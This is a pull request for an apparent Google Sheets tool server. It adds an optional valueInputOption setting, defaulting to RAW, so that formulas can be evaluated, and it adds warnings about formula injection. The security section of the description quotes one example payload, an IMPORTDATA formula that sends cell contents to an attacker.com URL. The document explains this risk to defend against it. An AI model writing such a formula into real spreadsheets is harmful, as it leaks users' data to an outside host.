### PR TITLE
feat: Add valueInputOption parameter for formula support

### DIFF
--- a/src/index.ts
+++ b/src/index.ts
@@ -316,13 +316,15 @@ const UpdateGoogleDocSchema = z.object({
 const CreateGoogleSheetSchema = z.object({
   name: z.string().min(1, "Sheet name is required"),
   data: z.array(z.array(z.string())),
-  parentFolderId: z.string().optional()
+  parentFolderId: z.string().optional(),
+  valueInputOption: z.enum(["RAW", "USER_ENTERED"]).optional()
 });
 
 const UpdateGoogleSheetSchema = z.object({
   spreadsheetId: z.string().min(1, "Spreadsheet ID is required"),
   range: z.string().min(1, "Range is required"),
-  data: z.array(z.array(z.string()))
+  data: z.array(z.array(z.string())),
+  valueInputOption: z.enum(["RAW", "USER_ENTERED"]).optional()
 });
 
 const GetGoogleSheetContentSchema = z.object({
@@ -846,7 +848,7 @@ server.setRequestHandler(ListToolsRequestSchema, async () => {
       },
       {
         name: "createGoogleSheet",
-        description: "Create a new Google Sheet",
+        description: "Create a new Google Sheet. By default uses RAW mode which stores values as-is. Set valueInputOption to 'USER_ENTERED' only when you need formulas to be evaluated.",
         inputSchema: {
           type: "object",
           properties: {
@@ -856,22 +858,33 @@ server.setRequestHandler(ListToolsRequestSchema, async () => {
               description: "Data as array of arrays",
               items: { type: "array", items: { type: "string" } }
             },
-            parentFolderId: { type: "string", description: "Parent folder ID (defaults to root)", optional: true }
+            parentFolderId: { type: "string", description: "Parent folder ID (defaults to root)", optional: true },
+            valueInputOption: {
+              type: "string",
+              enum: ["RAW", "USER_ENTERED"],
+              description: "RAW (default): Values stored exactly as provided - formulas stored as text strings. Safe for untrusted data. USER_ENTERED: Values parsed like spreadsheet UI - formulas (=SUM, =IF, etc.) are evaluated. SECURITY WARNING: USER_ENTERED can execute formulas, only use with trusted data, never with user-provided input that could contain malicious formulas like =IMPORTDATA() or =IMPORTRANGE()."
+            }
           },
           required: ["name", "data"]
         }
       },
       {
         name: "updateGoogleSheet",
-        description: "Update an existing Google Sheet",
+        description: "Update an existing Google Sheet. By default uses RAW mode which stores values as-is. Set valueInputOption to 'USER_ENTERED' only when you need formulas to be evaluated.",
         inputSchema: {
           type: "object",
           properties: {
             spreadsheetId: { type: "string", description: "Sheet ID" },
-            range: { type: "string", description: "Range to update" },
+            range: { type: "string", description: "Range to update (e.g., 'Sheet1!A1:C10')" },
             data: {
               type: "array",
+              description: "2D array of values to write",
               items: { type: "array", items: { type: "string" } }
+            },
+            valueInputOption: {
+              type: "string",
+              enum: ["RAW", "USER_ENTERED"],
+              description: "RAW (default): Values stored exactly as provided - formulas stored as text strings. Safe for untrusted data. USER_ENTERED: Values parsed like spreadsheet UI - formulas (=SUM, =IF, etc.) are evaluated. SECURITY WARNING: USER_ENTERED can execute formulas, only use with trusted data, never with user-provided input that could contain malicious formulas like =IMPORTDATA() or =IMPORTRANGE()."
             }
           },
           required: ["spreadsheetId", "range", "data"]
@@ -1906,7 +1919,7 @@ server.setRequestHandler(CallToolRequestSchema, async (request) => {
         await sheets.spreadsheets.values.update({
           spreadsheetId: spreadsheet.data.spreadsheetId!,
           range: 'Sheet1!A1',
-          valueInputOption: 'RAW',
+          valueInputOption: args.valueInputOption || 'RAW',
           requestBody: { values: args.data }
         });
 
@@ -1927,7 +1940,7 @@ server.setRequestHandler(CallToolRequestSchema, async (request) => {
         await sheets.spreadsheets.values.update({
           spreadsheetId: args.spreadsheetId,
           range: args.range,
-          valueInputOption: 'RAW',
+          valueInputOption: args.valueInputOption || 'RAW',
           requestBody: { values: args.data }
         });
 


### PR DESCRIPTION
## Summary

This PR adds a new optional `valueInputOption` parameter to `createGoogleSheet` and `updateGoogleSheet` tools, enabling users to choose between:

- **RAW** (default): Values stored exactly as provided - formulas stored as text strings. Safe for untrusted data.
- **USER_ENTERED**: Values parsed like spreadsheet UI - formulas (=SUM, =IF, etc.) are evaluated.

## Motivation

Currently, when inserting formulas like `=SUM(A1:A10)` or `=B13/12`, they are stored as literal text strings rather than being evaluated. This prevents users from creating dynamic spreadsheets with calculated fields.

## Changes

1. **Schema updates**: Added `valueInputOption` as optional enum parameter to both `CreateGoogleSheetSchema` and `UpdateGoogleSheetSchema`

2. **Tool descriptions**: Updated descriptions to explain when to use each option

3. **Security warning**: Added clear warning in the parameter description about formula injection risks with USER_ENTERED mode

4. **Implementation**: Updated both implementations to use `args.valueInputOption || 'RAW'` for backward compatibility

## Security Considerations

The tool descriptions include a security warning:

> SECURITY WARNING: USER_ENTERED can execute formulas, only use with trusted data, never with user-provided input that could contain malicious formulas like =IMPORTDATA() or =IMPORTRANGE().

This is important because malicious formulas could:
- Exfiltrate data via `=IMPORTDATA("https://attacker.com/log?data=" & A1)`
- Import external data via `=IMPORTRANGE()`
- Make unexpected HTTP requests

By defaulting to RAW, we maintain backward compatibility and security-by-default.

## Testing

- [x] TypeScript compiles without errors
- [x] Existing behavior unchanged (RAW is default)
- [x] USER_ENTERED properly evaluates formulas when specified